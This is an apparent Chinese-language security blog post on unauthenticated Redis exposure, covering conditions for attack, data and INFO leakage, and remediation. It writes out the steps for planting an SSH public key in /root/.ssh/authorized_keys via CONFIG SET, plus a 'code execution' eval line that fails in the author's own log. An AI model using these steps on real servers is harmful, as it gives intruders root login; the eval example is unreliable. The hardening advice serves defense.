标签:
catalog
1. Redis简介 2. 漏洞概述 3. 漏洞利用方式 4. 修复方式
1. Redis简介
Relevant Link:
http://www.cnblogs.com/LittleHann/p/3901588.html
2. 漏洞概述
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器
0x1: 漏洞描述
Redis安全模型的观念是: "请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的"
Redis 作者之所以放弃解决未授权访问导致的不安全性是因为
1. 99.99%使用Redis的场景都是在沙盒化的环境中,为了0.01%的可能性增加安全规则的同时也增加了复杂性 2. 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的
因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis 绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作
利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器
0x2: 漏洞利用条件
1. redis服务以root账户运行 2. redis无密码或弱密码进行认证 3. redis监听在0.0.0.0公网上
Relevant Link:
http://www.cnblogs.com/yangecnu/p/An-Production-Accidents-Caused-by-Redis-Attacked.html
2. 漏洞利用方式
0x1: 数据库数据泄露
Redis 作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等
0x2: 任意代码执行
Redis可以嵌套Lua脚本的特性将会导致代码执行
redis-cli eval "$(echo hacker /tmp/shell)" 0
0x3: 敏感信息泄露
通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫
# Server redis_version:2.8.13 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:161beea97cb9b816 redis_mode:standalone os:Linux 2.6.32-431.23.3.el6.x86_64 x86_64 arch_bits:64 multiplexing_api:epoll gcc_version:4.4.7 process_id:12537 run_id:977eace0aacf7c702db5ff0b689cf23cf0936dbc tcp_port:6379 uptime_in_seconds:17725 uptime_in_days:0 hz:10 lru_clock:4493657 config_file: # Clients connected_clients:1 client_longest_output_list:0 client_biggest_input_buf:0 blocked_clients:0 # Memory used_memory:810968 used_memory_human:791.96K used_memory_rss:2359296 used_memory_peak:810968 used_memory_peak_human:791.96K used_memory_lua:36864 mem_fragmentation_ratio:2.91 mem_allocator:jemalloc-3.6.0 # Persistence loading:0 rdb_changes_since_last_save:0 rdb_bgsave_in_progress:0 rdb_last_save_time:1447333284 rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec:1 rdb_current_bgsave_time_sec:-1 aof_enabled:0 aof_rewrite_in_progress:0 aof_rewrite_scheduled:0 aof_last_rewrite_time_sec:-1 aof_current_rewrite_time_sec:-1 aof_last_bgrewrite_status:ok aof_last_write_status:ok # Stats total_connections_received:5 total_commands_processed:5 instantaneous_ops_per_sec:0 rejected_connections:0 sync_full:0 sync_partial_ok:0 sync_partial_err:0 expired_keys:0 evicted_keys:0 keyspace_hits:1 keyspace_misses:1 pubsub_channels:0 pubsub_patterns:0 latest_fork_usec:233 # Replication role:master connected_slaves:0 master_repl_offset:0 repl_backlog_active:0 repl_backlog_size:1048576 repl_backlog_first_byte_offset:0 repl_backlog_histlen:0 # CPU used_cpu_sys:10.47 used_cpu_user:7.25 used_cpu_sys_children:0.00 used_cpu_user_children:0.00 # Keyspace 127.0.0.1:6379> [root@iZ23er0navtZ ~]# redis-cli 127.0.0.1:6379> auth littlehann OK 127.0.0.1:6379> [root@iZ23er0navtZ ~]# redis-cli 127.0.0.1:6379> keys * (error) ERR operation not permitted 127.0.0.1:6379> [root@iZ23er0navtZ ~]# redis-cli -h 127.0.0.1 -p 6379 -a littlehann 127.0.0.1:6379> keys * (empty list or set) 127.0.0.1:6379> [root@iZ23er0navtZ ~]# clear [root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0 (error) ERR unknown command ‘eval‘ [root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0 (error) ERR unknown command ‘eval‘ [root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0 -a littlehann (error) ERR unknown command ‘eval‘ [root@iZ23er0navtZ ~]# clear [root@iZ23er0navtZ ~]# redis-cli 127.0.0.1:6379> auth littlehann OK 127.0.0.1:6379> eval "$(echo hacker /tmp/shell)" 0 (error) ERR unknown command ‘eval‘ 127.0.0.1:6379> EVAL "$(echo hacker /tmp/shell)" 0 (error) ERR unknown command ‘EVAL‘ 127.0.0.1:6379> info redis_version:2.4.10 redis_git_sha1:00000000 redis_git_dirty:0 arch_bits:64 multiplexing_api:epoll gcc_version:4.4.6 process_id:12766 uptime_in_seconds:3970 uptime_in_days:0 lru_clock:30359 used_cpu_sys:0.46 used_cpu_user:0.73 used_cpu_sys_children:0.00 used_cpu_user_children:0.00 connected_clients:1 connected_slaves:0 client_longest_output_list:0 client_biggest_input_buf:0 blocked_clients:0 used_memory:726176 used_memory_human:709.16K used_memory_rss:1634304 used_memory_peak:726168 used_memory_peak_human:709.15K mem_fragmentation_ratio:2.25 mem_allocator:jemalloc-2.2.5 loading:0 aof_enabled:0 changes_since_last_save:0 bgsave_in_progress:0 last_save_time:1447334503 bgrewriteaof_in_progress:0 total_connections_received:7 total_commands_processed:4 expired_keys:0 evicted_keys:0 keyspace_hits:0 keyspace_misses:0 pubsub_channels:0 pubsub_patterns:0 latest_fork_usec:0 vm_enabled:0 role:master
0x4: 上传SSH公钥获得SSH登录权限
1. 首先在本地生产公私钥文件: ssh-keygen –t rsa 2. config set dir /root/.ssh/ 3. config set dbfilename authorized_keys 4. set xxxx "\n\n\nssh-rsa key_pub\n\n\n",其中key_pub为上一步生成的公钥,即可将公钥保存在远端服务器,使得登录时不需要输入账号与密码
Relevant Link:
http://www.freebuf.com/vuls/85188.html
4. 修复方式
1. redis.conf: bind 127.0.0.1 //redis本来就是作为内存数据库,只要监听在本机即可 2. 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中 3. 限定可以连接Redis服务器的IP 4. 修改Redis默认端口6379 5. 配置rename-command配置项"RENAME_CONFIG",这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度 6. 禁止使用 root 权限启动 redis 服务
Relevant Link:
http://www.freebuf.com/vuls/85021.html
Copyright (c) 2015 LittleHann All rights reserved
标签:
原文地址:http://www.cnblogs.com/LittleHann/p/4959433.html
